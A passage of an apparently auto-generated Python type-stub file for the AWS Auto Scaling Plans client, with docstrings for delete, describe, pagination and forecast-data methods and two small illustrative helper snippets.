Controls whether a resource\'s externally created scaling policies are kept or replaced.
The default value is ``KeepExternalPolicies`` . If the parameter is set to ``ReplaceExternalPolicies`` , any scaling policies that are external to AWS Auto Scaling are deleted and new target tracking scaling policies are created.
Only valid when configuring dynamic scaling.
Condition: The number of existing policies to be replaced must be less than or equal to 50. If there are more than 50 policies to be replaced, AWS Auto Scaling keeps all existing policies and does not create new ones.
- **DisableDynamicScaling** *(boolean) --*
Controls whether dynamic scaling by AWS Auto Scaling is disabled. When dynamic scaling is enabled, AWS Auto Scaling creates target tracking scaling policies based on the specified target tracking configurations.
The default is enabled (``false`` ).
:rtype: dict
:returns:
"""
pass
def delete_scaling_plan(self, ScalingPlanName: str, ScalingPlanVersion: int) -> Dict:
"""
Deletes the specified scaling plan.
Deleting a scaling plan deletes the underlying ScalingInstruction for all of the scalable resources that are covered by the plan.
If the plan has launched resources or has scaling activities in progress, you must delete those resources separately.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/autoscaling-plans-2018-01-06/DeleteScalingPlan>`_
**Request Syntax**
::
response = client.delete_scaling_plan(
ScalingPlanName='string',
ScalingPlanVersion=123
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type ScalingPlanName: string
:param ScalingPlanName: **[REQUIRED]**
The name of the scaling plan.
:type ScalingPlanVersion: integer
:param ScalingPlanVersion: **[REQUIRED]**
The version number of the scaling plan.
:rtype: dict
:returns:
"""
pass
def describe_scaling_plan_resources(self, ScalingPlanName: str, ScalingPlanVersion: int, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Describes the scalable resources in the specified scaling plan.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/autoscaling-plans-2018-01-06/DescribeScalingPlanResources>`_
**Request Syntax**
::
response = client.describe_scaling_plan_resources(
ScalingPlanName='string',
ScalingPlanVersion=123,
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'ScalingPlanResources': [
{
'ScalingPlanName': 'string',
'ScalingPlanVersion': 123,
'ServiceNamespace': 'autoscaling'|'ecs'|'ec2'|'rds'|'dynamodb',
'ResourceId': 'string',
'ScalableDimension': 'autoscaling:autoScalingGroup:DesiredCapacity'|'ecs:service:DesiredCount'|'ec2:spot-fleet-request:TargetCapacity'|'rds:cluster:ReadReplicaCount'|'dynamodb:table:ReadCapacityUnits'|'dynamodb:table:WriteCapacityUnits'|'dynamodb:index:ReadCapacityUnits'|'dynamodb:index:WriteCapacityUnits',
'ScalingPolicies': [
{
'PolicyName': 'string',
'PolicyType': 'TargetTrackingScaling',
'TargetTrackingConfiguration': {
'PredefinedScalingMetricSpecification': {
'PredefinedScalingMetricType': 'ASGAverageCPUUtilization'|'ASGAverageNetworkIn'|'ASGAverageNetworkOut'|'DynamoDBReadCapacityUtilization'|'DynamoDBWriteCapacityUtilization'|'ECSServiceAverageCPUUtilization'|'ECSServiceAverageMemoryUtilization'|'ALBRequestCountPerTarget'|'RDSReaderAverageCPUUtilization'|'RDSReaderAverageDatabaseConnections'|'EC2SpotFleetRequestAverageCPUUtilization'|'EC2SpotFleetRequestAverageNetworkIn'|'EC2SpotFleetRequestAverageNetworkOut',
'ResourceLabel': 'string'
},
'CustomizedScalingMetricSpecification': {
'MetricName': 'string',
'Namespace': 'string',
'Dimensions': [
{
'Name': 'string',
'Value': 'string'
},
],
'Statistic': 'Average'|'Minimum'|'Maximum'|'SampleCount'|'Sum',
'Unit': 'string'
},
'TargetValue': 123.0,
'DisableScaleIn': True|False,
'ScaleOutCooldown': 123,
'ScaleInCooldown': 123,
'EstimatedInstanceWarmup': 123
}
},
],
'ScalingStatusCode': 'Inactive'|'PartiallyActive'|'Active',
'ScalingStatusMessage': 'string'
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ScalingPlanResources** *(list) --*
Information about the scalable resources.
- *(dict) --*
Represents a scalable resource.
- **ScalingPlanName** *(string) --*
The name of the scaling plan.
- **ScalingPlanVersion** *(integer) --*
The version number of the scaling plan.
- **ServiceNamespace** *(string) --*
The namespace of the AWS service.
- **ResourceId** *(string) --*
The ID of the resource. This string consists of the resource type and unique identifier.
* Auto Scaling group - The resource type is ``autoScalingGroup`` and the unique identifier is the name of the Auto Scaling group. Example: ``autoScalingGroup/my-asg`` .
* ECS service - The resource type is ``service`` and the unique identifier is the cluster name and service name. Example: ``service/default/sample-webapp`` .
* Spot Fleet request - The resource type is ``spot-fleet-request`` and the unique identifier is the Spot Fleet request ID. Example: ``spot-fleet-request/sfr-73fbd2ce-aa30-494c-8788-1cee4EXAMPLE`` .
* DynamoDB table - The resource type is ``table`` and the unique identifier is the resource ID. Example: ``table/my-table`` .
* DynamoDB global secondary index - The resource type is ``index`` and the unique identifier is the resource ID. Example: ``table/my-table/index/my-table-index`` .
* Aurora DB cluster - The resource type is ``cluster`` and the unique identifier is the cluster name. Example: ``cluster:my-db-cluster`` .
- **ScalableDimension** *(string) --*
The scalable dimension for the resource.
* ``autoscaling:autoScalingGroup:DesiredCapacity`` - The desired capacity of an Auto Scaling group.
* ``ecs:service:DesiredCount`` - The desired task count of an ECS service.
* ``ec2:spot-fleet-request:TargetCapacity`` - The target capacity of a Spot Fleet request.
* ``dynamodb:table:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB table.
* ``dynamodb:table:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB table.
* ``dynamodb:index:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB global secondary index.
* ``dynamodb:index:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB global secondary index.
* ``rds:cluster:ReadReplicaCount`` - The count of Aurora Replicas in an Aurora DB cluster. Available for Aurora MySQL-compatible edition and Aurora PostgreSQL-compatible edition.
- **ScalingPolicies** *(list) --*
The scaling policies.
- *(dict) --*
Represents a scaling policy.
- **PolicyName** *(string) --*
The name of the scaling policy.
- **PolicyType** *(string) --*
The type of scaling policy.
- **TargetTrackingConfiguration** *(dict) --*
The target tracking scaling policy. Includes support for predefined or customized metrics.
- **PredefinedScalingMetricSpecification** *(dict) --*
A predefined metric. You can specify either a predefined metric or a customized metric.
- **PredefinedScalingMetricType** *(string) --*
The metric type. The ``ALBRequestCountPerTarget`` metric type applies only to Auto Scaling groups, Spot Fleet requests, and ECS services.
- **ResourceLabel** *(string) --*
Identifies the resource associated with the metric type. You can't specify a resource label unless the metric type is ``ALBRequestCountPerTarget`` and there is a target group for an Application Load Balancer attached to the Auto Scaling group, Spot Fleet request, or ECS service.
The format is app/<load-balancer-name>/<load-balancer-id>/targetgroup/<target-group-name>/<target-group-id>, where:
* app/<load-balancer-name>/<load-balancer-id> is the final portion of the load balancer ARN.
* targetgroup/<target-group-name>/<target-group-id> is the final portion of the target group ARN.
- **CustomizedScalingMetricSpecification** *(dict) --*
A customized metric. You can specify either a predefined metric or a customized metric.
- **MetricName** *(string) --*
The name of the metric.
- **Namespace** *(string) --*
The namespace of the metric.
- **Dimensions** *(list) --*
The dimensions of the metric.
Conditional: If you published your metric with dimensions, you must specify the same dimensions in your customized scaling metric specification.
- *(dict) --*
Represents a dimension for a customized metric.
- **Name** *(string) --*
The name of the dimension.
- **Value** *(string) --*
The value of the dimension.
- **Statistic** *(string) --*
The statistic of the metric.
- **Unit** *(string) --*
The unit of the metric.
- **TargetValue** *(float) --*
The target value for the metric. The range is 8.515920e-109 to 1.174271e+108 (Base 10) or 2e-360 to 2e360 (Base 2).
- **DisableScaleIn** *(boolean) --*
Indicates whether scale in by the target tracking scaling policy is disabled. If the value is ``true`` , scale in is disabled and the target tracking scaling policy doesn't remove capacity from the scalable resource. Otherwise, scale in is enabled and the target tracking scaling policy can remove capacity from the scalable resource.
The default value is ``false`` .
- **ScaleOutCooldown** *(integer) --*
The amount of time, in seconds, after a scale-out activity completes before another scale-out activity can start. This value is not used if the scalable resource is an Auto Scaling group.
While the cooldown period is in effect, the capacity that has been added by the previous scale-out event that initiated the cooldown is calculated as part of the desired capacity for the next scale out. The intention is to continuously (but not excessively) scale out.
- **ScaleInCooldown** *(integer) --*
The amount of time, in seconds, after a scale-in activity completes before another scale-in activity can start. This value is not used if the scalable resource is an Auto Scaling group.
The cooldown period is used to block subsequent scale-in requests until it has expired. The intention is to scale in conservatively to protect your application's availability. However, if another alarm triggers a scale-out policy during the cooldown period after a scale-in, AWS Auto Scaling scales out your scalable target immediately.
- **EstimatedInstanceWarmup** *(integer) --*
The estimated time, in seconds, until a newly launched instance can contribute to the CloudWatch metrics. This value is used only if the resource is an Auto Scaling group.
- **ScalingStatusCode** *(string) --*
The scaling status of the resource.
* ``Active`` - The scaling configuration is active.
* ``Inactive`` - The scaling configuration is not active because the scaling plan is being created or the scaling configuration could not be applied. Check the status message for more information.
* ``PartiallyActive`` - The scaling configuration is partially active because the scaling plan is being created or deleted or the scaling configuration could not be fully applied. Check the status message for more information.
- **ScalingStatusMessage** *(string) --*
A simple message about the current scaling status of the resource.
- **NextToken** *(string) --*
The token required to get the next set of results. This value is ``null`` if there are no more results to return.
:type ScalingPlanName: string
:param ScalingPlanName: **[REQUIRED]**
The name of the scaling plan.
:type ScalingPlanVersion: integer
:param ScalingPlanVersion: **[REQUIRED]**
The version number of the scaling plan.
:type MaxResults: integer
:param MaxResults:
The maximum number of scalable resources to return. The value must be between 1 and 50. The default value is 50.
:type NextToken: string
:param NextToken:
The token for the next set of results.
:rtype: dict
:returns:
"""
pass
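The target tracking structure described above pairs exactly one metric specification (predefined or customized) with a target value. A minimal sketch of assembling such a dict in plain Python, enforcing the either/or rule; the helper name and the metric/target values are illustrative assumptions, not part of the SDK:
```python
# Sketch: build a dict shaped like the TargetTrackingConfiguration above.
# Not part of boto3; the function name and defaults are illustrative.

def build_target_tracking_config(target_value, predefined_metric_type=None,
                                 customized_metric=None, disable_scale_in=False):
    """Return a TargetTrackingConfiguration-shaped dict.

    Exactly one of predefined_metric_type or customized_metric must be given,
    mirroring the "predefined or customized metric" rule in the docs.
    """
    if (predefined_metric_type is None) == (customized_metric is None):
        raise ValueError("Specify either a predefined metric or a customized metric")
    config = {"TargetValue": float(target_value), "DisableScaleIn": disable_scale_in}
    if predefined_metric_type is not None:
        config["PredefinedScalingMetricSpecification"] = {
            "PredefinedScalingMetricType": predefined_metric_type,
        }
    else:
        config["CustomizedScalingMetricSpecification"] = customized_metric
    return config

# Example: track 50% average CPU on an Auto Scaling group.
cfg = build_target_tracking_config(50.0,
                                   predefined_metric_type="ASGAverageCPUUtilization")
```
The resulting dict can be passed inside `TargetTrackingConfigurations` when creating or updating a scaling plan.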
def describe_scaling_plans(self, ScalingPlanNames: List = None, ScalingPlanVersion: int = None, ApplicationSources: List = None, MaxResults: int = None, NextToken: str = None) -> Dict:
"""
Describes one or more of your scaling plans.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/autoscaling-plans-2018-01-06/DescribeScalingPlans>`_
**Request Syntax**
::
response = client.describe_scaling_plans(
ScalingPlanNames=[
'string',
],
ScalingPlanVersion=123,
ApplicationSources=[
{
'CloudFormationStackARN': 'string',
'TagFilters': [
{
'Key': 'string',
'Values': [
'string',
]
},
]
},
],
MaxResults=123,
NextToken='string'
)
**Response Syntax**
::
{
'ScalingPlans': [
{
'ScalingPlanName': 'string',
'ScalingPlanVersion': 123,
'ApplicationSource': {
'CloudFormationStackARN': 'string',
'TagFilters': [
{
'Key': 'string',
'Values': [
'string',
]
},
]
},
'ScalingInstructions': [
{
'ServiceNamespace': 'autoscaling'|'ecs'|'ec2'|'rds'|'dynamodb',
'ResourceId': 'string',
'ScalableDimension': 'autoscaling:autoScalingGroup:DesiredCapacity'|'ecs:service:DesiredCount'|'ec2:spot-fleet-request:TargetCapacity'|'rds:cluster:ReadReplicaCount'|'dynamodb:table:ReadCapacityUnits'|'dynamodb:table:WriteCapacityUnits'|'dynamodb:index:ReadCapacityUnits'|'dynamodb:index:WriteCapacityUnits',
'MinCapacity': 123,
'MaxCapacity': 123,
'TargetTrackingConfigurations': [
{
'PredefinedScalingMetricSpecification': {
'PredefinedScalingMetricType': 'ASGAverageCPUUtilization'|'ASGAverageNetworkIn'|'ASGAverageNetworkOut'|'DynamoDBReadCapacityUtilization'|'DynamoDBWriteCapacityUtilization'|'ECSServiceAverageCPUUtilization'|'ECSServiceAverageMemoryUtilization'|'ALBRequestCountPerTarget'|'RDSReaderAverageCPUUtilization'|'RDSReaderAverageDatabaseConnections'|'EC2SpotFleetRequestAverageCPUUtilization'|'EC2SpotFleetRequestAverageNetworkIn'|'EC2SpotFleetRequestAverageNetworkOut',
'ResourceLabel': 'string'
},
'CustomizedScalingMetricSpecification': {
'MetricName': 'string',
'Namespace': 'string',
'Dimensions': [
{
'Name': 'string',
'Value': 'string'
},
],
'Statistic': 'Average'|'Minimum'|'Maximum'|'SampleCount'|'Sum',
'Unit': 'string'
},
'TargetValue': 123.0,
'DisableScaleIn': True|False,
'ScaleOutCooldown': 123,
'ScaleInCooldown': 123,
'EstimatedInstanceWarmup': 123
},
],
'PredefinedLoadMetricSpecification': {
'PredefinedLoadMetricType': 'ASGTotalCPUUtilization'|'ASGTotalNetworkIn'|'ASGTotalNetworkOut'|'ALBTargetGroupRequestCount',
'ResourceLabel': 'string'
},
'CustomizedLoadMetricSpecification': {
'MetricName': 'string',
'Namespace': 'string',
'Dimensions': [
{
'Name': 'string',
'Value': 'string'
},
],
'Statistic': 'Average'|'Minimum'|'Maximum'|'SampleCount'|'Sum',
'Unit': 'string'
},
'ScheduledActionBufferTime': 123,
'PredictiveScalingMaxCapacityBehavior': 'SetForecastCapacityToMaxCapacity'|'SetMaxCapacityToForecastCapacity'|'SetMaxCapacityAboveForecastCapacity',
'PredictiveScalingMaxCapacityBuffer': 123,
'PredictiveScalingMode': 'ForecastAndScale'|'ForecastOnly',
'ScalingPolicyUpdateBehavior': 'KeepExternalPolicies'|'ReplaceExternalPolicies',
'DisableDynamicScaling': True|False
},
],
'StatusCode': 'Active'|'ActiveWithProblems'|'CreationInProgress'|'CreationFailed'|'DeletionInProgress'|'DeletionFailed'|'UpdateInProgress'|'UpdateFailed',
'StatusMessage': 'string',
'StatusStartTime': datetime(2015, 1, 1),
'CreationTime': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ScalingPlans** *(list) --*
Information about the scaling plans.
- *(dict) --*
Represents a scaling plan.
- **ScalingPlanName** *(string) --*
The name of the scaling plan.
- **ScalingPlanVersion** *(integer) --*
The version number of the scaling plan.
- **ApplicationSource** *(dict) --*
The application source.
- **CloudFormationStackARN** *(string) --*
The Amazon Resource Name (ARN) of an AWS CloudFormation stack.
- **TagFilters** *(list) --*
A set of tags (up to 50).
- *(dict) --*
Represents a tag.
- **Key** *(string) --*
The tag key.
- **Values** *(list) --*
The tag values (0 to 20).
- *(string) --*
- **ScalingInstructions** *(list) --*
The scaling instructions.
- *(dict) --*
Describes a scaling instruction for a scalable resource.
The scaling instruction is used in combination with a scaling plan, which is a set of instructions for configuring dynamic scaling and predictive scaling for the scalable resources in your application. Each scaling instruction applies to one resource.
AWS Auto Scaling creates target tracking scaling policies based on the scaling instructions. Target tracking scaling policies adjust the capacity of your scalable resource as required to maintain resource utilization at the target value that you specified.
AWS Auto Scaling also configures predictive scaling for your Amazon EC2 Auto Scaling groups using a subset of parameters, including the load metric, the scaling metric, the target value for the scaling metric, the predictive scaling mode (forecast and scale or forecast only), and the desired behavior when the forecast capacity exceeds the maximum capacity of the resource. With predictive scaling, AWS Auto Scaling generates forecasts with traffic predictions for the two days ahead and schedules scaling actions that proactively add and remove resource capacity to match the forecast.
We recommend waiting a minimum of 24 hours after creating an Auto Scaling group to configure predictive scaling. At minimum, there must be 24 hours of historical data to generate a forecast.
For more information, see `Getting Started with AWS Auto Scaling <https://docs.aws.amazon.com/autoscaling/plans/userguide/auto-scaling-getting-started.html>`__ .
- **ServiceNamespace** *(string) --*
The namespace of the AWS service.
- **ResourceId** *(string) --*
The ID of the resource. This string consists of the resource type and unique identifier.
* Auto Scaling group - The resource type is ``autoScalingGroup`` and the unique identifier is the name of the Auto Scaling group. Example: ``autoScalingGroup/my-asg`` .
* ECS service - The resource type is ``service`` and the unique identifier is the cluster name and service name. Example: ``service/default/sample-webapp`` .
* Spot Fleet request - The resource type is ``spot-fleet-request`` and the unique identifier is the Spot Fleet request ID. Example: ``spot-fleet-request/sfr-73fbd2ce-aa30-494c-8788-1cee4EXAMPLE`` .
* DynamoDB table - The resource type is ``table`` and the unique identifier is the resource ID. Example: ``table/my-table`` .
* DynamoDB global secondary index - The resource type is ``index`` and the unique identifier is the resource ID. Example: ``table/my-table/index/my-table-index`` .
* Aurora DB cluster - The resource type is ``cluster`` and the unique identifier is the cluster name. Example: ``cluster:my-db-cluster`` .
- **ScalableDimension** *(string) --*
The scalable dimension associated with the resource.
* ``autoscaling:autoScalingGroup:DesiredCapacity`` - The desired capacity of an Auto Scaling group.
* ``ecs:service:DesiredCount`` - The desired task count of an ECS service.
* ``ec2:spot-fleet-request:TargetCapacity`` - The target capacity of a Spot Fleet request.
* ``dynamodb:table:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB table.
* ``dynamodb:table:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB table.
* ``dynamodb:index:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB global secondary index.
* ``dynamodb:index:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB global secondary index.
* ``rds:cluster:ReadReplicaCount`` - The count of Aurora Replicas in an Aurora DB cluster. Available for Aurora MySQL-compatible edition and Aurora PostgreSQL-compatible edition.
- **MinCapacity** *(integer) --*
The minimum capacity of the resource.
- **MaxCapacity** *(integer) --*
The maximum capacity of the resource. The exception to this upper limit is if you specify a non-default setting for **PredictiveScalingMaxCapacityBehavior** .
- **TargetTrackingConfigurations** *(list) --*
The structure that defines new target tracking configurations (up to 10). Each of these structures includes a specific scaling metric and a target value for the metric, along with various parameters to use with dynamic scaling.
With predictive scaling and dynamic scaling, the resource scales based on the target tracking configuration that provides the largest capacity for both scale in and scale out.
Condition: The scaling metric must be unique across target tracking configurations.
- *(dict) --*
Describes a target tracking configuration to use with AWS Auto Scaling. Used with ScalingInstruction and ScalingPolicy .
- **PredefinedScalingMetricSpecification** *(dict) --*
A predefined metric. You can specify either a predefined metric or a customized metric.
- **PredefinedScalingMetricType** *(string) --*
The metric type. The ``ALBRequestCountPerTarget`` metric type applies only to Auto Scaling groups, Spot Fleet requests, and ECS services.
- **ResourceLabel** *(string) --*
Identifies the resource associated with the metric type. You can't specify a resource label unless the metric type is ``ALBRequestCountPerTarget`` and there is a target group for an Application Load Balancer attached to the Auto Scaling group, Spot Fleet request, or ECS service.
The format is app/<load-balancer-name>/<load-balancer-id>/targetgroup/<target-group-name>/<target-group-id>, where:
* app/<load-balancer-name>/<load-balancer-id> is the final portion of the load balancer ARN.
* targetgroup/<target-group-name>/<target-group-id> is the final portion of the target group ARN.
- **CustomizedScalingMetricSpecification** *(dict) --*
A customized metric. You can specify either a predefined metric or a customized metric.
- **MetricName** *(string) --*
The name of the metric.
- **Namespace** *(string) --*
The namespace of the metric.
- **Dimensions** *(list) --*
The dimensions of the metric.
Conditional: If you published your metric with dimensions, you must specify the same dimensions in your customized scaling metric specification.
- *(dict) --*
Represents a dimension for a customized metric.
- **Name** *(string) --*
The name of the dimension.
- **Value** *(string) --*
The value of the dimension.
- **Statistic** *(string) --*
The statistic of the metric.
- **Unit** *(string) --*
The unit of the metric.
- **TargetValue** *(float) --*
The target value for the metric. The range is 8.515920e-109 to 1.174271e+108 (Base 10) or 2e-360 to 2e360 (Base 2).
- **DisableScaleIn** *(boolean) --*
Indicates whether scale in by the target tracking scaling policy is disabled. If the value is ``true`` , scale in is disabled and the target tracking scaling policy doesn't remove capacity from the scalable resource. Otherwise, scale in is enabled and the target tracking scaling policy can remove capacity from the scalable resource.
The default value is ``false`` .
- **ScaleOutCooldown** *(integer) --*
The amount of time, in seconds, after a scale-out activity completes before another scale-out activity can start. This value is not used if the scalable resource is an Auto Scaling group.
While the cooldown period is in effect, the capacity that has been added by the previous scale-out event that initiated the cooldown is calculated as part of the desired capacity for the next scale out. The intention is to continuously (but not excessively) scale out.
- **ScaleInCooldown** *(integer) --*
The amount of time, in seconds, after a scale-in activity completes before another scale-in activity can start. This value is not used if the scalable resource is an Auto Scaling group.
The cooldown period is used to block subsequent scale-in requests until it has expired. The intention is to scale in conservatively to protect your application's availability. However, if another alarm triggers a scale-out policy during the cooldown period after a scale-in, AWS Auto Scaling scales out your scalable target immediately.
- **EstimatedInstanceWarmup** *(integer) --*
The estimated time, in seconds, until a newly launched instance can contribute to the CloudWatch metrics. This value is used only if the resource is an Auto Scaling group.
- **PredefinedLoadMetricSpecification** *(dict) --*
The predefined load metric to use for predictive scaling. This parameter or a **CustomizedLoadMetricSpecification** is required when configuring predictive scaling, and cannot be used otherwise.
- **PredefinedLoadMetricType** *(string) --*
The metric type.
- **ResourceLabel** *(string) --*
Identifies the resource associated with the metric type. You can't specify a resource label unless the metric type is ``ALBRequestCountPerTarget`` and there is a target group for an Application Load Balancer attached to the Auto Scaling group.
The format is app/<load-balancer-name>/<load-balancer-id>/targetgroup/<target-group-name>/<target-group-id>, where:
* app/<load-balancer-name>/<load-balancer-id> is the final portion of the load balancer ARN.
* targetgroup/<target-group-name>/<target-group-id> is the final portion of the target group ARN.
- **CustomizedLoadMetricSpecification** *(dict) --*
The customized load metric to use for predictive scaling. This parameter or a **PredefinedLoadMetricSpecification** is required when configuring predictive scaling, and cannot be used otherwise.
- **MetricName** *(string) --*
The name of the metric.
- **Namespace** *(string) --*
The namespace of the metric.
- **Dimensions** *(list) --*
The dimensions of the metric.
Conditional: If you published your metric with dimensions, you must specify the same dimensions in your customized load metric specification.
- *(dict) --*
Represents a dimension for a customized metric.
- **Name** *(string) --*
The name of the dimension.
- **Value** *(string) --*
The value of the dimension.
- **Statistic** *(string) --*
The statistic of the metric. Currently, the value must always be ``Sum`` .
- **Unit** *(string) --*
The unit of the metric.
- **ScheduledActionBufferTime** *(integer) --*
The amount of time, in seconds, to buffer the run time of scheduled scaling actions when scaling out. For example, if the forecast says to add capacity at 10:00 AM, and the buffer time is 5 minutes, then the run time of the corresponding scheduled scaling action will be 9:55 AM. The intention is to give resources time to be provisioned. For example, it can take a few minutes to launch an EC2 instance. The actual amount of time required depends on several factors, such as the size of the instance and whether there are startup scripts to complete.
The value must be less than the forecast interval duration of 3600 seconds (60 minutes). The default is 300 seconds.
Only valid when configuring predictive scaling.
- **PredictiveScalingMaxCapacityBehavior** *(string) --*
Defines the behavior that should be applied if the forecast capacity approaches or exceeds the maximum capacity specified for the resource. The default value is ``SetForecastCapacityToMaxCapacity`` .
The following are possible values:
* ``SetForecastCapacityToMaxCapacity`` - AWS Auto Scaling cannot scale resource capacity higher than the maximum capacity. The maximum capacity is enforced as a hard limit.
* ``SetMaxCapacityToForecastCapacity`` - AWS Auto Scaling may scale resource capacity higher than the maximum capacity to equal but not exceed forecast capacity.
* ``SetMaxCapacityAboveForecastCapacity`` - AWS Auto Scaling may scale resource capacity higher than the maximum capacity by a specified buffer value. The intention is to give the target tracking scaling policy extra capacity if unexpected traffic occurs.
Only valid when configuring predictive scaling.
- **PredictiveScalingMaxCapacityBuffer** *(integer) --*
The size of the capacity buffer to use when the forecast capacity is close to or exceeds the maximum capacity. The value is specified as a percentage relative to the forecast capacity. For example, if the buffer is 10, this means a 10 percent buffer, such that if the forecast capacity is 50, and the maximum capacity is 40, then the effective maximum capacity is 55.
Only valid when configuring predictive scaling. Required if the **PredictiveScalingMaxCapacityBehavior** is set to ``SetMaxCapacityAboveForecastCapacity`` , and cannot be used otherwise.
The range is 1-100.
- **PredictiveScalingMode** *(string) --*
The predictive scaling mode. The default value is ``ForecastAndScale`` . If the mode is ``ForecastOnly`` , AWS Auto Scaling forecasts capacity but does not create any scheduled scaling actions based on the capacity forecast.
- **ScalingPolicyUpdateBehavior** *(string) --*
Controls whether a resource's externally created scaling policies are kept or replaced.
The default value is ``KeepExternalPolicies`` . If the parameter is set to ``ReplaceExternalPolicies`` , any scaling policies that are external to AWS Auto Scaling are deleted and new target tracking scaling policies created.
Only valid when configuring dynamic scaling.
Condition: The number of existing policies to be replaced must be less than or equal to 50. If there are more than 50 policies to be replaced, AWS Auto Scaling keeps all existing policies and does not create new ones.
- **DisableDynamicScaling** *(boolean) --*
Controls whether dynamic scaling by AWS Auto Scaling is disabled. When dynamic scaling is enabled, AWS Auto Scaling creates target tracking scaling policies based on the specified target tracking configurations.
The default is enabled (``false`` ).
- **StatusCode** *(string) --*
The status of the scaling plan.
* ``Active`` - The scaling plan is active.
* ``ActiveWithProblems`` - The scaling plan is active, but the scaling configuration for one or more resources could not be applied.
* ``CreationInProgress`` - The scaling plan is being created.
* ``CreationFailed`` - The scaling plan could not be created.
* ``DeletionInProgress`` - The scaling plan is being deleted.
* ``DeletionFailed`` - The scaling plan could not be deleted.
* ``UpdateInProgress`` - The scaling plan is being updated.
* ``UpdateFailed`` - The scaling plan could not be updated.
- **StatusMessage** *(string) --*
A simple message about the current status of the scaling plan.
- **StatusStartTime** *(datetime) --*
The Unix time stamp when the scaling plan entered the current status.
- **CreationTime** *(datetime) --*
The Unix time stamp when the scaling plan was created.
- **NextToken** *(string) --*
The token required to get the next set of results. This value is ``null`` if there are no more results to return.
:type ScalingPlanNames: list
:param ScalingPlanNames:
The names of the scaling plans (up to 10). If you specify application sources, you cannot specify scaling plan names.
- *(string) --*
:type ScalingPlanVersion: integer
:param ScalingPlanVersion:
The version number of the scaling plan. If you specify a scaling plan version, you must also specify a scaling plan name.
:type ApplicationSources: list
:param ApplicationSources:
The sources for the applications (up to 10). If you specify scaling plan names, you cannot specify application sources.
- *(dict) --*
Represents an application source.
- **CloudFormationStackARN** *(string) --*
The Amazon Resource Name (ARN) of an AWS CloudFormation stack.
- **TagFilters** *(list) --*
A set of tags (up to 50).
- *(dict) --*
Represents a tag.
- **Key** *(string) --*
The tag key.
- **Values** *(list) --*
The tag values (0 to 20).
- *(string) --*
:type MaxResults: integer
:param MaxResults:
The maximum number of scalable resources to return. This value can be between 1 and 50. The default value is 50.
:type NextToken: string
:param NextToken:
The token for the next set of results.
:rtype: dict
:returns:
"""
pass
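The `NextToken` contract above (a token in the response means more results; its absence means the final page) implies a simple fetch loop. A runnable sketch of that pattern; `FakeClient` is a stand-in defined here so the loop can be exercised without AWS credentials, and with a real boto3 client the loop body is identical:
```python
# Sketch of the NextToken pagination pattern for describe_scaling_plans.
# FakeClient is a local stand-in, not part of boto3.

class FakeClient:
    """Serves two canned pages of scaling plans, then stops."""
    def __init__(self):
        self._pages = [
            {"ScalingPlans": [{"ScalingPlanName": "plan-a"}], "NextToken": "t1"},
            {"ScalingPlans": [{"ScalingPlanName": "plan-b"}]},  # no NextToken: last page
        ]
    def describe_scaling_plans(self, **kwargs):
        return self._pages[1] if kwargs.get("NextToken") == "t1" else self._pages[0]

def list_all_scaling_plans(client):
    """Collect every scaling plan by following NextToken until it is absent."""
    plans, kwargs = [], {"MaxResults": 50}
    while True:
        response = client.describe_scaling_plans(**kwargs)
        plans.extend(response.get("ScalingPlans", []))
        token = response.get("NextToken")
        if not token:  # null/absent token means no more results to return
            return plans
        kwargs["NextToken"] = token

names = [p["ScalingPlanName"] for p in list_all_scaling_plans(FakeClient())]
```
With a real client, ``client.get_paginator('describe_scaling_plans')`` encapsulates the same loop.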
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method's model.
:returns: The presigned url
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you'd normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator("create_foo")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_scaling_plan_resource_forecast_data(self, ScalingPlanName: str, ScalingPlanVersion: int, ServiceNamespace: str, ResourceId: str, ScalableDimension: str, ForecastDataType: str, StartTime: datetime, EndTime: datetime) -> Dict:
"""
Retrieves the forecast data for a scalable resource.
Capacity forecasts are represented as predicted values, or data points, that are calculated using historical data points from a specified CloudWatch load metric. Data points are available for up to 56 days.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/autoscaling-plans-2018-01-06/GetScalingPlanResourceForecastData>`_
**Request Syntax**
::
response = client.get_scaling_plan_resource_forecast_data(
ScalingPlanName='string',
ScalingPlanVersion=123,
ServiceNamespace='autoscaling'|'ecs'|'ec2'|'rds'|'dynamodb',
ResourceId='string',
ScalableDimension='autoscaling:autoScalingGroup:DesiredCapacity'|'ecs:service:DesiredCount'|'ec2:spot-fleet-request:TargetCapacity'|'rds:cluster:ReadReplicaCount'|'dynamodb:table:ReadCapacityUnits'|'dynamodb:table:WriteCapacityUnits'|'dynamodb:index:ReadCapacityUnits'|'dynamodb:index:WriteCapacityUnits',
ForecastDataType='CapacityForecast'|'LoadForecast'|'ScheduledActionMinCapacity'|'ScheduledActionMaxCapacity',
